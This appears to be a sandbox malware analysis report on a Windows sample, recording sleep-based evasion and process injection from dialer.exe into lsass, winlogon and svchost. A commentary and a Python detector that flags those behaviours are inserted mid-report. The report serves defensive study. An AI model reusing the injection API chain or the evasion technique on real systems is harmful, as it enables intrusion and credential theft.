                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (46 identical rows)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (5 identical rows)

Malware Analysis System Evasion

Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,FindCloseChangeNotification,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,
Source: C:\Users\user\Desktop\file.exe TID: 7020 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep count: 9616 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2632 Thread sleep count: 9159 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7104 Thread sleep count: 104 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7104 Thread sleep time: -104000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 6736 Thread sleep count: 49 > 30
Source: C:\Windows\System32\lsass.exe TID: 6736 Thread sleep time: -49000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5644 Thread sleep count: 98 > 30
Source: C:\Windows\System32\svchost.exe TID: 5644 Thread sleep time: -98000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2832 Thread sleep count: 90 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5988 Thread sleep count: 2655 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5988 Thread sleep count: 1313 > 30
Source: C:\Windows\System32\svchost.exe TID: 5952 Thread sleep count: 81 > 30
Source: C:\Windows\System32\svchost.exe TID: 5952 Thread sleep time: -81000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1812 Thread sleep count: 80 > 30
Source: C:\Windows\System32\svchost.exe TID: 1812 Thread sleep time: -80000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep count: 79 > 30
Source: C:\Windows\System32\svchost.exe TID: 320 Thread sleep time: -79000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4636 Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exe TID: 4636 Thread sleep time: -76000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7036 Thread sleep count: 74 > 30
Source: C:\Windows\System32\svchost.exe TID: 7036 Thread sleep time: -74000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2608 Thread sleep count: 53 > 30
Source: C:\Windows\System32\svchost.exe TID: 2608 Thread sleep time: -53000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5624 Thread sleep count: 65 > 30
Source: C:\Windows\System32\svchost.exe TID: 5624 Thread sleep time: -65000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7164 Thread sleep count: 69 > 30
Source: C:\Windows\System32\svchost.exe TID: 7164 Thread sleep time: -69000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe TID: 4612 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4688 Thread sleep count: 67 > 30
Source: C:\Windows\System32\svchost.exe TID: 4688 Thread sleep time: -67000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4536 Thread sleep count: 69 > 30
Source: C:\Windows\System32\svchost.exe TID: 4536 Thread sleep time: -69000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 920 Thread sleep count: 66 > 30
Source: C:\Windows\System32\svchost.exe TID: 920 Thread sleep time: -66000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3680 Thread sleep count: 65 > 30
Source: C:\Windows\System32\svchost.exe TID: 3680 Thread sleep time: -65000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7136 Thread sleep count: 64 > 30
Source: C:\Windows\System32\svchost.exe TID: 7136 Thread sleep time: -64000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7072 Thread sleep count: 60 > 30
Source: C:\Windows\System32\svchost.exe TID: 7072 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1764 Thread sleep count: 8670 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4272 Thread sleep count: 60 > 30
Source: C:\Windows\System32\svchost.exe TID: 4272 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3612 Thread sleep count: 61 > 30
Source: C:\Windows\System32\svchost.exe TID: 3612 Thread sleep time: -61000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep count: 57 > 30
Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep time: -57000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1004 Thread sleep count: 58 > 30
Source: C:\Windows\System32\svchost.exe TID: 1004 Thread sleep time: -58000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 780 Thread sleep count: 57 > 30
Source: C:\Windows\System32\svchost.exe TID: 780 Thread sleep time: -57000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (3 identical rows)
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed (2 identical rows)
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed (2 identical rows)
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (4 identical rows)
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (29 identical rows)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (6 identical rows)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (4 identical rows)
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 identical rows)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9616
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9159
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2655
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1313
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8670
Source: C:\Windows\System32\dialer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFC9D021785 sldt word ptr [eax-0362DA78h]
Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe API coverage: 8.0 %
Source: C:\Windows\System32\lsass.exe API coverage: 6.0 %
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5BBBE3C FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5C1BE3C FindFirstFileExW,
Source: C:\Windows\System32\lsass.exe Code function: 15_2_000001F89C03BE3C FindFirstFileExW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 identical rows)
Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5BB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dialer.exe Code function: 11_2_00007FF7D2FD14E4 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,FindCloseChangeNotification,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,RtlReleasePrivilege,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (2 identical rows)
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5BB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5BC3218 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5BB81D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5BBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5C17E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5C23218 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5C181D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exe Code function: 14_2_00000268A5C1B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exe Code function: 15_2_000001F89C03B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exe Code function: 15_2_000001F89C0381D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\lsass.exe Code function: 15_2_000001F89C043218 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exe Code function: 15_2_000001F89C037E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
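Two kinds of row in this section carry most of the signal. The powershell.exe delays of 922337203685477 (and the 6456360425798339 value) are not sleep loops but a single effectively infinite wait: 922337203685477 ms is 2^63-1 expressed in 100-nanosecond ticks, the largest relative interval NtDelayExecution accepts, so the thread simply parks until the sandbox times out. The dialer.exe code function that chains OpenProcess, OpenProcessToken/GetTokenInformation/GetSidSubAuthority, VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx is the injection routine behind the long "Memory written" list in the next section, where one process writes into winlogon.exe, lsass.exe, dwm.exe, spoolsv.exe and dozens of svchost.exe instances. The Python below is an added example and not part of the Joe Sandbox report or of the sample: it parses rows in the report's own format (the sample rows are a constructed subset of the rows on this page, and the patterns accept both the spaced and the cell-fused spelling that extraction produces), sums and flags the thread delays per image, and builds the writer-to-target map so that a process writing into many images, or into or out of lsass.exe and winlogon.exe, stands out. Treating the report's "s" suffix as milliseconds, the SENSITIVE image list and the min_targets threshold are the example's own assumptions, not values from the report.

```python
"""Pull two behaviours out of Joe Sandbox-style signature rows: evasive thread
delays and one process writing into many others (the injection fan-out)."""
import re
from collections import defaultdict

# Constructed sample: rows copied from the report above. Whitespace between the
# Source cell and the detail cell does not always survive extraction, so the
# patterns below accept both "file.exe Memory written" and "file.exeMemory written".
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7104 Thread sleep time: -104000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 6736 Thread sleep time: -49000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7020 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\dialer.exe base: 7C8454C010
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 268A5A50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 1F89C000000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2028AB40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 205B9510000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 1CCF0290000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B102A80000
"""

SLEEP_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe) TID: (?P<tid>\d+)\s*"
    r"Thread sleep time: -(?P<delay>\d+)s >= -(?P<threshold>\d+)s$"
)
WRITE_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe)\s*Memory written: (?P<dst>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)$"
)

# The report suffixes delays with "s", but the magnitudes (30000 for the sandbox's
# 30-second threshold) are milliseconds; treated as ms here (assumption about units).
# 2**63-1 100-ns ticks expressed in ms: the largest relative wait NtDelayExecution
# accepts, i.e. "sleep until the sandbox gives up".
FOREVER_MS = (2**63 - 1) // 10_000  # 922337203685477

# Images that have no business writing into, or being written into by, anything
# else. Illustrative list chosen for this example, not taken from the report.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(text):
    """Turn raw rows into records; rows matching neither pattern are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        m = SLEEP_RE.match(line)
        if m:
            records.append({"kind": "sleep", "src": basename(m["src"]), "tid": int(m["tid"]),
                            "delay_ms": int(m["delay"]), "threshold_ms": int(m["threshold"])})
            continue
        m = WRITE_RE.match(line)
        if m:
            records.append({"kind": "write", "src": basename(m["src"]),
                            "dst": basename(m["dst"]), "base": int(m["base"], 16)})
    return records


def sleep_summary(records):
    """Per source image: summed delay, rows over the sandbox threshold, and whether
    any single delay is effectively infinite (the 922337203685477 rows above)."""
    out = {}
    for r in records:
        if r["kind"] != "sleep":
            continue
        s = out.setdefault(r["src"], {"total_ms": 0, "over_threshold": 0, "forever": False})
        s["total_ms"] += r["delay_ms"]
        s["over_threshold"] += int(r["delay_ms"] >= r["threshold_ms"])
        s["forever"] = s["forever"] or r["delay_ms"] >= FOREVER_MS
    return out


def injection_fanout(records, min_targets=3):
    """Writers worth alerting on: a source that writes into at least `min_targets`
    distinct images, touches a sensitive image, or is itself a sensitive image
    (lsass.exe writing into WMIADAP.exe means lsass.exe was already taken over)."""
    regions = defaultdict(lambda: defaultdict(set))  # src -> dst -> {base addresses}
    for r in records:
        if r["kind"] == "write":
            regions[r["src"]][r["dst"]].add(r["base"])
    alerts = {}
    for src, dsts in regions.items():
        hit_sensitive = sorted(SENSITIVE & set(dsts))
        if len(dsts) >= min_targets or hit_sensitive or src in SENSITIVE:
            alerts[src] = {
                "targets": sorted(dsts),
                "regions": sum(len(bases) for bases in dsts.values()),
                "sensitive": hit_sensitive,
            }
    return alerts


if __name__ == "__main__":
    recs = parse(SAMPLE_ROWS)
    for image, s in sleep_summary(recs).items():
        print(f"{image:16} total={s['total_ms']}ms over_threshold={s['over_threshold']} forever={s['forever']}")
    for src, a in injection_fanout(recs).items():
        print(f"{src:16} -> {a['regions']} region(s) in {a['targets']} sensitive={a['sensitive']}")
```

On the sample rows the fan-out check alerts on dialer.exe (four distinct images, five regions, two of them sensitive) and on lsass.exe as a writer, while file.exe writing only into dialer.exe stays below the threshold; the same rule is what you would run over Sysmon Event ID 8 (CreateRemoteThread) and 10 (ProcessAccess) on a live host rather than over scraped report rows.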

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Section loaded: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe Section loaded: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp target: unknown protection: readonly (2 identical rows)
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\dialer.exe base: 7C8454C010
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 268A5A50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 1F89C000000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2028AB40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 205B9510000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 1CCF0290000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BC8AF50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEBD3B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2735A070000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FDE5D40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 254513D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 13982AF0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 28075470000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 16B11FA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24A0DA40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 13954070000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 198375C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E4DB990000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 11AECDD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe base: 1EC16F80000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F0108C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A03E6A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B66F1C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BAA95D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DAC1150000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7923A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADC2340000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24D249A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B2C0FB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: AD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1EEC8960000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 256EDBD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA7ED70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 175B4780000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17CD1620000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 13F17A90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 181E95B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF53B20000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1755C590000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC61270000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B102A80000
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe Memory written: C:\Windows\System32\dialer.exe base: C6F3C01010
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe Memory written: C:\Windows\System32\dialer.exe base: F2C8AF3010
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 268A5A50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 1F89C000000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2028AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 205B9510000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 1CCF0290000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BC8AF50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DEBD3B0000 protect: page execute and read and write
